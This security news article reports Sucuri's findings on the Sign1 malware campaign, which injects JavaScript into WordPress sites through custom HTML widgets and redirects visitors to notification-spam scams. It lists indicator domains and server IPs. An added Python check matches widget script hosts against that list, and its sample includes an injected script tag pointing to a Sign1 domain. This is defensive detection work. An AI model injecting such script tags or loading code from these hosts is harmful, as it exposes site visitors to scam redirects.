Security researchers at Sucuri have uncovered a malware campaign targeting WordPress websites. The Sign1 malware, known for its code injection techniques, has reportedly infected a staggering 39,000 sites.

Once the threat actors gain access, they use WordPress custom HTML widgets or, more commonly, install the legitimate Simple Custom CSS and JS plugin to inject the malicious JavaScript code.

Sucuri’s analysis of Sign1 shows that the malware uses time-based randomization to generate dynamic URLs that change every 10 minutes to evade blocks. The domains are registered shortly before they are used in attacks, so they’re not in any blocklists.

These URLs are used to fetch further malicious scripts that are run in a visitor’s browser. 

Initially, the domains were hosted on Namecheap, but the attackers have now moved to HETZNER for hosting and Cloudflare for IP address obfuscation.

Domain | Registration Date | PublicWWW Detections
--- | --- | ---
js.abc-cdn[.]online | 2023-07-31 | 1873 sites
spf.js-min[.]site | 2023-09-07 | 581 sites
cdn.jsdevlvr[.]info | 2023-09-18 | 245 sites
cdn.wt-api[.]top | 2023-09-22 | 316 sites
load.365analytics[.]xyz | 2023-10-17 | 2790 sites
stat.counter247[.]live | 2023-10-18 | 1089 sites
js.opttracker[.]online | 2023-10-19 | 1485 + 3667 sites
l.js-assets[.]cloud | 2023-10-25 | 4445 sites
api.localadswidget[.]com | 2023-11-24 | 1229 sites
page.24supportkit[.]com | 2023-12-05 | 2163 sites
streaming.jsonmediapacks[.]com | 2023-12-29 | 1291 sites
js.schema-forms[.]org | 2024-01-18 | N/A
stylesheet.webstaticcdn[.]com | 2024-02-05 | N/A
assets.watchasync[.]com | 2024-02-22 | N/A
tags.stickloader[.]info | 2024-03-06 | N/A

Initially, the domains were hosted on the Namecheap 162.0.228.112 server. Then attackers started using a server on the HETZNER network (5.75.230.95, 95.217.217.254, 128.140.70.175) and began using Cloudflare to hide the server location.

The script then redirects the visitor to scam sites, such as fake captchas, that try to trick you into enabling browser notifications. These notifications deliver unwanted advertisements directly to your operating system desktop.
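A defender-side check in the spirit of the findings above, added here as an example and not Sucuri's code: it pulls the external script hosts out of HTML as it would be stored in a custom HTML widget or snippet plugin and compares them against the table's domains, matching on hostname only because Sign1 changes the URL path every 10 minutes. The allowlist and the sample widget content are constructed for the example.

```python
import re
from urllib.parse import urlparse
# Sign1 domains from the Sucuri table, kept in the defanged "[.]" form they were published in.
SIGN1_DOMAINS_DEFANGED = [
    "js.abc-cdn[.]online", "spf.js-min[.]site", "cdn.jsdevlvr[.]info", "cdn.wt-api[.]top",
    "load.365analytics[.]xyz", "stat.counter247[.]live", "js.opttracker[.]online",
    "l.js-assets[.]cloud", "api.localadswidget[.]com", "page.24supportkit[.]com",
    "streaming.jsonmediapacks[.]com", "js.schema-forms[.]org", "stylesheet.webstaticcdn[.]com",
    "assets.watchasync[.]com", "tags.stickloader[.]info",
]
def refang(domain):
    """Turn a defanged indicator back into a matchable hostname."""
    return domain.replace("[.]", ".").lower()

KNOWN_SIGN1_HOSTS = {refang(d) for d in SIGN1_DOMAINS_DEFANGED}
DEFAULT_ALLOWLIST = {"cdnjs.cloudflare.com"}  # assumption: this site's legitimate script hosts
# src="..." on <script> tags, either quote style; inline scripts have no src and do not match.
SCRIPT_SRC = re.compile(r"<script\b[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)
def script_hosts(html):
    """Hostnames of every external <script src>; relative paths yield no host and are skipped."""
    hosts = []
    for src in SCRIPT_SRC.findall(html):
        host = urlparse(src).hostname  # protocol-relative "//host/path" parses normally
        if host:
            hosts.append(host.lower())
    return hosts

def triage(html, allowlist=DEFAULT_ALLOWLIST):
    """Classify each external script host. Sign1 changes the URL every 10 minutes,
    so the match is on the hostname only, never on the full URL."""
    verdicts = []
    for host in script_hosts(html):
        if host in KNOWN_SIGN1_HOSTS:
            verdicts.append((host, "known Sign1 domain"))
        elif host in allowlist:
            verdicts.append((host, "allowlisted"))
        else:  # domains are registered days before use, so unlisted hosts deserve review too
            verdicts.append((host, "unknown external host"))
    return verdicts

# Constructed sample of what might sit in a WordPress custom HTML widget.
SAMPLE_WIDGET = "\n".join([
    '<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>',
    "<script>var inlineCounter = 1;</script>",
    f"<script type='text/javascript' src='//{refang('tags.stickloader[.]info')}/c/1710000000.js'></script>",
    '<script src="/wp-includes/js/wp-embed.min.js"></script>',
    '<script src="https://static.unknown-host.test/w.js"></script>',
])
print(triage(SAMPLE_WIDGET))
```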


Sucuri warns that Sign1 has evolved over the past six months, with infections spiking when a new version of the malware is released.

In the past six months, Sucuri’s scanners detected the malware on over 39,000 websites, while the latest attack wave, which has been underway since January 2024, has claimed 2,500 sites.